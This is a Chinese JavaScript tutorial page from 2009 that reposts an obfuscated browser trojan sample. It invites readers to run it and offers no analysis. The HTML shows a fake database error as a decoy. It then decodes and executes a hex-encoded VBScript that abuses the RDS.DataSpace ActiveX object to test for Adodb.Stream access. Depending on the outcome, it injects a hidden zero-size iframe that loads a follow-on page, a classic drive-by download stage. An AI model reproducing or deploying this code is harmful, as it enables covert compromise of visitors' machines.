当前位置: 首页 > 图文教程 > 网络编程 > Javascript > js eval木马代码,以后再分析吧

Javascript
JavaScript Break 和 Continue区别教程
JavaScript 特殊字符
JavaScript 指导方针
JavaScript进阶教程(第四课第一部分)
JavaScript初级教程(第一课)
JavaScript初级教程(第五课续)
JavaScript进阶教程(第一课)
JavaScript进阶教程(第二课)
JavaScript进阶教程(第二课续)
JavaScript进阶教程(第三课)
JavaScript进阶教程(第三课第二部分)
setTimeout在类中使用的问题!
如何解决attachEvent函数时,this指向被绑定的元素的问题?
js检测客户端不是firefox则提示下载
在页面上点击任一链接时触发一个事件的代码
仿豆瓣分页原型(Javascript版)
javascript表格控件:Chgrid,简化型
收集的网上用的ajax之chat.js文件
给网站上的广告“加速”显示的方法
在JavaScript中通过URL传递汉字的方法

Javascript 中的 js eval木马代码,以后再分析吧


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-12   浏览: 65 ::
收藏到网摘: n/a

从下面的木马中,发现的书写js的另一方法
点击运行可以看到效果:
[Ctrl+A 全选 提示:你可先修改部分代码,再按运行]

复制代码 代码如下:

<html>
<body>
<script type="text/jscript">
function init() {
document.write("Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'");}
window.onload = init;
</script>
<script language="VBScript">
S="0d202020206f6e206572726f7220726573756d65206e6578740d202020205365742073696e61203d20646f63756d656e742e637265617465456c656d656e7428226f626a65637422290d2020202073696e612e7365744174747269627574652022636c6173736964222c2022636c7369643a42443936433535362d363541332d313144302d393833412d303043303446433239453336220d20202020536574206261696475203d2073696e612e4372656174654f626a65637428224d6963726f736f66742e584d4c48545450222c2222290d20202020676f6f67313d2241646f220d20202020676f6f67323d2264622e220d20202020676f6f67333d22537472220d20202020676f6f67343d2265616d220d20202020676f6f743d676f6f673126676f6f673226676f6f673326676f6f67340d20202020706f733d676f6f740d20202020536574206e5053203d2073696e612e4372656174654f626a65637428706f732c2222290d6966204e6f74204572722e4e756d626572203d2030207468656e0d6572722e636c6561720d646f63756d656e742e77726974652028223c696672616d65207372633d676f6f676c652e68746d2077696474683d30206865696768743d303e22290d656c73650d646f63756d656e742e77726974652028223c696672616d65207372633d42414944552e68746d2077696474683d30206865696768743d303e22290d656e642069660d"
flag_type="vbs"
D=""
DO WHILE LEN(S)>1
k="&H"+LEFT(S,2)
p=CLng(k)
m=chr(p)
D=D&m
S=MID(S,3)
LOOP
if flag_type="vbs" then
EXECUTE D
end if
</script>
<script language="javaScript">
if (flag_type=="js") {
eval(D);}
</script>
</body>
</html>